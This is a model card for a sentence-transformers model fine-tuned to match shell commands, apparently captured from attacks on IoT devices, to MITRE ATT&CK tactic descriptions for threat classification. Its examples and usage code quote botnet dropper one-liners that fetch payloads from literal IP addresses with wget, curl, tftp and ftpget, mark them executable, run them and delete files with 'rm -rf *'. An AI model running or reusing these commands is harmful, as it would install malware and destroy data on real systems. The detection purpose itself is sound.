tags:
  - sentence-transformers
  - sentence-similarity
  - feature-extraction
  - generated_from_trainer
  - dataset_size:212
  - loss:CosineSimilarityLoss
base_model: sentence-transformers/all-mpnet-base-v2
widget:
  - source_sentence: sh; enable; system; shell; /bin/busybox
    sentences:
      - >-
        Defense Evasion: The adversary is trying to avoid being detected.


        Defense Evasion consists of techniques that adversaries use to avoid
        detection throughout their compromise. Techniques used for defense
        evasion include uninstalling/disabling security software or
        obfuscating/encrypting data and scripts. Adversaries also leverage and
        abuse trusted processes to hide and masquerade their malware. Other
        tactics’ techniques are cross-listed here when those techniques include
        the added benefit of subverting defenses. 
      - >-
        Defense Evasion: The adversary is trying to avoid being detected.


        Defense Evasion consists of techniques that adversaries use to avoid
        detection throughout their compromise. Techniques used for defense
        evasion include uninstalling/disabling security software or
        obfuscating/encrypting data and scripts. Adversaries also leverage and
        abuse trusted processes to hide and masquerade their malware. Other
        tactics’ techniques are cross-listed here when those techniques include
        the added benefit of subverting defenses. 
      - >-
        Lateral Movement: The adversary is trying to move through your
        environment.


        Lateral Movement consists of techniques that adversaries use to enter
        and control remote systems on a network. Following through on their
        primary objective often requires exploring the network to find their
        target and subsequently gaining access to it. Reaching their objective
        often involves pivoting through multiple systems and accounts to gain.
        Adversaries might install their own remote access tools to accomplish
        Lateral Movement or use legitimate credentials with native network and
        operating system tools, which may be stealthier. 
  - source_sentence: enable; ; system; ; shell; ; SH; ; /bin/busybox
    sentences:
      - >-
        Persistence: The adversary is trying to maintain their foothold.


        Persistence consists of techniques that adversaries use to keep access
        to systems across restarts, changed credentials, and other interruptions
        that could cut off their access. Techniques used for persistence include
        any access, action, or configuration changes that let them maintain
        their foothold on systems, such as replacing or hijacking legitimate
        code or adding startup code. 
      - >-
        Privilege Escalation: The adversary is trying to gain higher-level
        permissions.


        Privilege Escalation consists of techniques that adversaries use to gain
        higher-level permissions on a system or network. Adversaries can often
        enter and explore a network with unprivileged access but require
        elevated permissions to follow through on their objectives. Common
        approaches are to take advantage of system weaknesses,
        misconfigurations, and vulnerabilities. Examples of elevated access
        include: 


        * SYSTEM/root level

        * local administrator

        * user account with admin-like access 

        * user accounts with access to specific system or perform specific
        function


        These techniques often overlap with Persistence techniques, as OS
        features that let an adversary persist can execute in an elevated
        context.  
      - >-
        Defense Evasion: The adversary is trying to avoid being detected.


        Defense Evasion consists of techniques that adversaries use to avoid
        detection throughout their compromise. Techniques used for defense
        evasion include uninstalling/disabling security software or
        obfuscating/encrypting data and scripts. Adversaries also leverage and
        abuse trusted processes to hide and masquerade their malware. Other
        tactics’ techniques are cross-listed here when those techniques include
        the added benefit of subverting defenses. 
  - source_sentence: zlxx; enable; ; system; ; shell; ; sh; ; /bin/busybox
    sentences:
      - >-
        Defense Evasion: The adversary is trying to avoid being detected.


        Defense Evasion consists of techniques that adversaries use to avoid
        detection throughout their compromise. Techniques used for defense
        evasion include uninstalling/disabling security software or
        obfuscating/encrypting data and scripts. Adversaries also leverage and
        abuse trusted processes to hide and masquerade their malware. Other
        tactics’ techniques are cross-listed here when those techniques include
        the added benefit of subverting defenses. 
      - >-
        Execution: The adversary is trying to run malicious code.


        Execution consists of techniques that result in adversary-controlled
        code running on a local or remote system. Techniques that run malicious
        code are often paired with techniques from all other tactics to achieve
        broader goals, like exploring a network or stealing data. For example,
        an adversary might use a remote access tool to run a PowerShell script
        that does Remote System Discovery. 
      - >-
        Persistence: The adversary is trying to maintain their foothold.


        Persistence consists of techniques that adversaries use to keep access
        to systems across restarts, changed credentials, and other interruptions
        that could cut off their access. Techniques used for persistence include
        any access, action, or configuration changes that let them maintain
        their foothold on systems, such as replacing or hijacking legitimate
        code or adding startup code. 
  - source_sentence: >-
      cd /tmp; cd /var/run; cd /mnt; cd /root; cd /; wget
      http://89.110.99.68/bot; chmod 777 *; ./bot; cd /tmp; cd /var/run; cd
      /mnt; cd /root; cd /; wget http://89.110.99.68/bot; chmod 777 *; ./bot
    sentences:
      - >-
        Resource Development: The adversary is trying to establish resources
        they can use to support operations.


        Resource Development consists of techniques that involve adversaries
        creating, purchasing, or compromising/stealing resources that can be
        used to support targeting. Such resources include infrastructure,
        accounts, or capabilities. These resources can be leveraged by the
        adversary to aid in other phases of the adversary lifecycle, such as
        using purchased domains to support Command and Control, email accounts
        for phishing as a part of Initial Access, or stealing code signing
        certificates to help with Defense Evasion.
      - >-
        Privilege Escalation: The adversary is trying to gain higher-level
        permissions.


        Privilege Escalation consists of techniques that adversaries use to gain
        higher-level permissions on a system or network. Adversaries can often
        enter and explore a network with unprivileged access but require
        elevated permissions to follow through on their objectives. Common
        approaches are to take advantage of system weaknesses,
        misconfigurations, and vulnerabilities. Examples of elevated access
        include: 


        * SYSTEM/root level

        * local administrator

        * user account with admin-like access 

        * user accounts with access to specific system or perform specific
        function


        These techniques often overlap with Persistence techniques, as OS
        features that let an adversary persist can execute in an elevated
        context.  
      - >-
        Execution: The adversary is trying to run malicious code.


        Execution consists of techniques that result in adversary-controlled
        code running on a local or remote system. Techniques that run malicious
        code are often paired with techniques from all other tactics to achieve
        broader goals, like exploring a network or stealing data. For example,
        an adversary might use a remote access tool to run a PowerShell script
        that does Remote System Discovery. 
  - source_sentence: >-
      cd /tmp; cd /var/run; cd /mnt; cd /root; cd /; wget
      http://74.48.108.226/phantom.sh; chmod 777 phantom.sh; sh phantom.sh;
      chmod 777 phantom.sh; sh phantom.sh; chmod 777 phantom2.sh; sh
      phantom2.sh; sh phantom1.sh; rm -rf phantom.sh phantom.sh phantom2.sh
      phantom1.sh; rm -rf *; curl -O http://74.48.108.226/phantom.sh; tftp
      74.48.108.226 -c get phantom.sh; tftp -r phantom2.sh -g 74.48.108.226;
      ftpget -v -u anonymous -p anonymous -P 21 74.48.108.226 phantom1.sh
      phantom1.sh
    sentences:
      - >-
        Reconnaissance: The adversary is trying to gather information they can
        use to plan future operations.


        Reconnaissance consists of techniques that involve adversaries actively
        or passively gathering information that can be used to support
        targeting. Such information may include details of the victim
        organization, infrastructure, or staff/personnel. This information can
        be leveraged by the adversary to aid in other phases of the adversary
        lifecycle, such as using gathered information to plan and execute
        Initial Access, to scope and prioritize post-compromise objectives, or
        to drive and lead further Reconnaissance efforts.
      - >-
        Reconnaissance: The adversary is trying to gather information they can
        use to plan future operations.


        Reconnaissance consists of techniques that involve adversaries actively
        or passively gathering information that can be used to support
        targeting. Such information may include details of the victim
        organization, infrastructure, or staff/personnel. This information can
        be leveraged by the adversary to aid in other phases of the adversary
        lifecycle, such as using gathered information to plan and execute
        Initial Access, to scope and prioritize post-compromise objectives, or
        to drive and lead further Reconnaissance efforts.
      - >-
        Privilege Escalation: The adversary is trying to gain higher-level
        permissions.


        Privilege Escalation consists of techniques that adversaries use to gain
        higher-level permissions on a system or network. Adversaries can often
        enter and explore a network with unprivileged access but require
        elevated permissions to follow through on their objectives. Common
        approaches are to take advantage of system weaknesses,
        misconfigurations, and vulnerabilities. Examples of elevated access
        include: 


        * SYSTEM/root level

        * local administrator

        * user account with admin-like access 

        * user accounts with access to specific system or perform specific
        function


        These techniques often overlap with Persistence techniques, as OS
        features that let an adversary persist can execute in an elevated
        context.  
pipeline_tag: sentence-similarity
library_name: sentence-transformers

SentenceTransformer based on sentence-transformers/all-mpnet-base-v2

This is a sentence-transformers model finetuned from sentence-transformers/all-mpnet-base-v2. It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.

Model Details

Model Description

  • Model Type: Sentence Transformer
  • Base model: sentence-transformers/all-mpnet-base-v2
  • Maximum Sequence Length: 384 tokens
  • Output Dimensionality: 768 dimensions
  • Similarity Function: Cosine Similarity

Model Sources

  • Documentation: Sentence Transformers Documentation (https://sbert.net)
  • Repository: Sentence Transformers on GitHub (https://github.com/UKPLab/sentence-transformers)
  • Hugging Face: Sentence Transformers on Hugging Face (https://huggingface.co/models?library=sentence-transformers)

Full Model Architecture

SentenceTransformer(
  (0): Transformer({'max_seq_length': 384, 'do_lower_case': False}) with Transformer model: MPNetModel 
  (1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
  (2): Normalize()
)
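The Pooling and Normalize modules above amount to masked mean pooling over the transformer's token embeddings followed by L2 normalization. A minimal NumPy sketch of that computation (the random arrays below are illustrative stand-ins for real token embeddings):

```python
import numpy as np

def mean_pool(token_embeddings, attention_mask):
    """Masked mean pooling: average token embeddings, ignoring padding."""
    mask = attention_mask[..., None].astype(token_embeddings.dtype)  # (batch, seq, 1)
    summed = (token_embeddings * mask).sum(axis=1)                   # (batch, dim)
    counts = np.clip(mask.sum(axis=1), 1e-9, None)                   # avoid divide-by-zero
    return summed / counts

def l2_normalize(v):
    """Scale each vector to unit length, as the Normalize() module does."""
    return v / np.linalg.norm(v, axis=-1, keepdims=True)

# Toy batch: 2 sequences, 5 tokens each, 768-dimensional token embeddings
rng = np.random.default_rng(0)
tokens = rng.normal(size=(2, 5, 768))
mask = np.array([[1, 1, 1, 0, 0],    # last two tokens are padding
                 [1, 1, 1, 1, 1]])   # no padding

sentence_embeddings = l2_normalize(mean_pool(tokens, mask))
print(sentence_embeddings.shape)  # (2, 768)
```

Because of the final normalization step, every sentence embedding this model produces has unit length.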

Usage

Direct Usage (Sentence Transformers)

First install the Sentence Transformers library:

pip install -U sentence-transformers

Then you can load this model and run inference.

from sentence_transformers import SentenceTransformer

# Download from the 🤗 Hub
model = SentenceTransformer("cebollet/fine-tuned-mitre-model")
# Run inference
sentences = [
    'cd /tmp; cd /var/run; cd /mnt; cd /root; cd /; wget http://74.48.108.226/phantom.sh; chmod 777 phantom.sh; sh phantom.sh; chmod 777 phantom.sh; sh phantom.sh; chmod 777 phantom2.sh; sh phantom2.sh; sh phantom1.sh; rm -rf phantom.sh phantom.sh phantom2.sh phantom1.sh; rm -rf *; curl -O http://74.48.108.226/phantom.sh; tftp 74.48.108.226 -c get phantom.sh; tftp -r phantom2.sh -g 74.48.108.226; ftpget -v -u anonymous -p anonymous -P 21 74.48.108.226 phantom1.sh phantom1.sh',
    'Reconnaissance: The adversary is trying to gather information they can use to plan future operations.\n\nReconnaissance consists of techniques that involve adversaries actively or passively gathering information that can be used to support targeting. Such information may include details of the victim organization, infrastructure, or staff/personnel. This information can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as using gathered information to plan and execute Initial Access, to scope and prioritize post-compromise objectives, or to drive and lead further Reconnaissance efforts.',
    'Privilege Escalation: The adversary is trying to gain higher-level permissions.\n\nPrivilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. Adversaries can often enter and explore a network with unprivileged access but require elevated permissions to follow through on their objectives. Common approaches are to take advantage of system weaknesses, misconfigurations, and vulnerabilities. Examples of elevated access include: \n\n* SYSTEM/root level\n* local administrator\n* user account with admin-like access \n* user accounts with access to specific system or perform specific function\n\nThese techniques often overlap with Persistence techniques, as OS features that let an adversary persist can execute in an elevated context.  ',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 768]

# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities.shape)
# [3, 3]

Training Details

Training Dataset

Unnamed Dataset

  • Size: 212 training samples
  • Columns: sentence_0, sentence_1, and label
  • Approximate statistics based on the first 212 samples:
    • sentence_0 (string): min 4 tokens, mean 65.7 tokens, max 384 tokens
    • sentence_1 (string): min 82 tokens, mean 103.74 tokens, max 153 tokens
    • label (float): min 0.0, mean 0.5, max 1.0
  • Samples:
    • sentence_0: sh; enable; klv1234; system; shell; echo "string"
      sentence_1: Initial Access: The adversary is trying to get into your network. Initial Access consists of techniques that use various entry vectors to gain their initial foothold within a network. Techniques used to gain a foothold include targeted spearphishing and exploiting weaknesses on public-facing web servers. Footholds gained through initial access may allow for continued access, like valid accounts and use of external remote services, or may be limited-use due to changing passwords.
      label: 0.0
    • sentence_0: sh; ping; sh; enable; system; shell; linuxshell; /bin/busybox
      sentence_1: Lateral Movement: The adversary is trying to move through your environment. Lateral Movement consists of techniques that adversaries use to enter and control remote systems on a network. Following through on their primary objective often requires exploring the network to find their target and subsequently gaining access to it. Reaching their objective often involves pivoting through multiple systems and accounts to gain. Adversaries might install their own remote access tools to accomplish Lateral Movement or use legitimate credentials with native network and operating system tools, which may be stealthier.
      label: 0.0
    • sentence_0: enable; ; linuxshell; ; system; ; sh; ; /bin/busybox
      sentence_1: Privilege Escalation: The adversary is trying to gain higher-level permissions. Privilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. Adversaries can often enter and explore a network with unprivileged access but require elevated permissions to follow through on their objectives. Common approaches are to take advantage of system weaknesses, misconfigurations, and vulnerabilities. Examples of elevated access include: SYSTEM/root level; local administrator; user account with admin-like access; user accounts with access to specific system or perform specific function. These techniques often overlap with Persistence techniques, as OS features that let an adversary persist can execute in an elevated context.
      label: 1.0
  • Loss: CosineSimilarityLoss with these parameters:
    {
        "loss_fct": "torch.nn.modules.loss.MSELoss"
    }
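CosineSimilarityLoss computes the cosine similarity of each (sentence_0, sentence_1) embedding pair and regresses it onto the float label with the configured MSELoss. A NumPy sketch of that objective (the toy embeddings below are illustrative; during training the loss operates on the model's own embeddings):

```python
import numpy as np

def cosine_similarity_loss(emb_a, emb_b, labels):
    """MSE between pairwise cosine similarities and the target labels."""
    a = emb_a / np.linalg.norm(emb_a, axis=1, keepdims=True)
    b = emb_b / np.linalg.norm(emb_b, axis=1, keepdims=True)
    cos = (a * b).sum(axis=1)            # cosine similarity per pair
    return ((cos - labels) ** 2).mean()  # torch.nn.MSELoss equivalent

# Two toy pairs: one matching (label 1.0), one non-matching (label 0.0)
emb_a = np.array([[1.0, 0.0], [0.0, 1.0]])
emb_b = np.array([[2.0, 0.0], [3.0, 0.0]])  # parallel to a[0], orthogonal to a[1]
labels = np.array([1.0, 0.0])

print(cosine_similarity_loss(emb_a, emb_b, labels))  # 0.0 (perfect predictions)
```

Minimizing this loss pushes embedding pairs labeled 1.0 together and pairs labeled 0.0 apart, which is why the resulting model scores a command highest against its matching tactic description.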
    

Training Hyperparameters

Non-Default Hyperparameters

  • per_device_train_batch_size: 4
  • per_device_eval_batch_size: 4
  • num_train_epochs: 10
  • multi_dataset_batch_sampler: round_robin

All Hyperparameters

  • overwrite_output_dir: False
  • do_predict: False
  • eval_strategy: no
  • prediction_loss_only: True
  • per_device_train_batch_size: 4
  • per_device_eval_batch_size: 4
  • per_gpu_train_batch_size: None
  • per_gpu_eval_batch_size: None
  • gradient_accumulation_steps: 1
  • eval_accumulation_steps: None
  • torch_empty_cache_steps: None
  • learning_rate: 5e-05
  • weight_decay: 0.0
  • adam_beta1: 0.9
  • adam_beta2: 0.999
  • adam_epsilon: 1e-08
  • max_grad_norm: 1
  • num_train_epochs: 10
  • max_steps: -1
  • lr_scheduler_type: linear
  • lr_scheduler_kwargs: {}
  • warmup_ratio: 0.0
  • warmup_steps: 0
  • log_level: passive
  • log_level_replica: warning
  • log_on_each_node: True
  • logging_nan_inf_filter: True
  • save_safetensors: True
  • save_on_each_node: False
  • save_only_model: False
  • restore_callback_states_from_checkpoint: False
  • no_cuda: False
  • use_cpu: False
  • use_mps_device: False
  • seed: 42
  • data_seed: None
  • jit_mode_eval: False
  • use_ipex: False
  • bf16: False
  • fp16: False
  • fp16_opt_level: O1
  • half_precision_backend: auto
  • bf16_full_eval: False
  • fp16_full_eval: False
  • tf32: None
  • local_rank: 0
  • ddp_backend: None
  • tpu_num_cores: None
  • tpu_metrics_debug: False
  • debug: []
  • dataloader_drop_last: False
  • dataloader_num_workers: 0
  • dataloader_prefetch_factor: None
  • past_index: -1
  • disable_tqdm: False
  • remove_unused_columns: True
  • label_names: None
  • load_best_model_at_end: False
  • ignore_data_skip: False
  • fsdp: []
  • fsdp_min_num_params: 0
  • fsdp_config: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
  • fsdp_transformer_layer_cls_to_wrap: None
  • accelerator_config: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
  • deepspeed: None
  • label_smoothing_factor: 0.0
  • optim: adamw_torch
  • optim_args: None
  • adafactor: False
  • group_by_length: False
  • length_column_name: length
  • ddp_find_unused_parameters: None
  • ddp_bucket_cap_mb: None
  • ddp_broadcast_buffers: False
  • dataloader_pin_memory: True
  • dataloader_persistent_workers: False
  • skip_memory_metrics: True
  • use_legacy_prediction_loop: False
  • push_to_hub: False
  • resume_from_checkpoint: None
  • hub_model_id: None
  • hub_strategy: every_save
  • hub_private_repo: None
  • hub_always_push: False
  • gradient_checkpointing: False
  • gradient_checkpointing_kwargs: None
  • include_inputs_for_metrics: False
  • include_for_metrics: []
  • eval_do_concat_batches: True
  • fp16_backend: auto
  • push_to_hub_model_id: None
  • push_to_hub_organization: None
  • mp_parameters:
  • auto_find_batch_size: False
  • full_determinism: False
  • torchdynamo: None
  • ray_scope: last
  • ddp_timeout: 1800
  • torch_compile: False
  • torch_compile_backend: None
  • torch_compile_mode: None
  • include_tokens_per_second: False
  • include_num_input_tokens_seen: False
  • neftune_noise_alpha: None
  • optim_target_modules: None
  • batch_eval_metrics: False
  • eval_on_start: False
  • use_liger_kernel: False
  • eval_use_gather_object: False
  • average_tokens_across_devices: False
  • prompts: None
  • batch_sampler: batch_sampler
  • multi_dataset_batch_sampler: round_robin

Training Logs

Epoch    Step   Training Loss
9.4340   500    0.0526

Framework Versions

  • Python: 3.11.13
  • Sentence Transformers: 4.1.0
  • Transformers: 4.52.4
  • PyTorch: 2.6.0+cu124
  • Accelerate: 1.7.0
  • Datasets: 2.14.4
  • Tokenizers: 0.21.1

Citation

BibTeX

Sentence Transformers

@inproceedings{reimers-2019-sentence-bert,
    title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
    author = "Reimers, Nils and Gurevych, Iryna",
    booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
    month = "11",
    year = "2019",
    publisher = "Association for Computational Linguistics",
    url = "https://arxiv.org/abs/1908.10084",
}